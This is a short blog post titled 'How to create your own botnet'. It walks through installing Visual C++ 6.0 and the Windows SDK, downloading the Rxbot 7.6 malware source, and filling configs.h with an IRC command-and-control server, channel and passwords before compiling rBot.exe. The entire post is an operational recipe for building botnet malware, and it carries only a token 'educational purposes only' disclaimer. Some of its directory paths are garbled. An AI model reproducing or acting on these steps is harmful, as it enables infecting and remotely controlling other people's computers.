- Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
- Download and install the Service pack 6
- Download and install Windows SDK
- Open up Microsoft Visual C++ Compilier 6.0
- Go to Tools > Options and Click the Directories tab
- Now, browse to these directories and add them to the list: (Click the dotted box to add)
C:PROGRAM FILESMICROSOFT PLATFORM SDK
C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB - Make sure they're in the order above (use the arrows to adjust the order)
- Download Rxbot 7.6
- Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Put in quotations:
char password[] = Bot_login_pass; // bot password (Ex: monkey)
char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
char serverpass[] = ; // server password (not usually needed)
char channel[] = #botz_channel; // channel that the bot should join
char chanpass[] = My_channel_pass; // channel password
Optional:
char server2[] = ; // backup server
char channel2[] = ; // backup channel
char chanpass2[] = ; //Backup channel pass - Make sure Microsoft Visual C++ is open
- Select File > Open Workspace
- Browse to your Rxbot 7.6 folder and open the rBot.dsw file
- Right Click rBot Files and click Build:
- rBot.exe will be in the Rxbot 7.6 > Debug directory
- AND YOUR DONE
- NOTE:"THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY"
How to create your own botnet
Sunday, 13 September 2015
Subscribe to:
Posts (Atom)
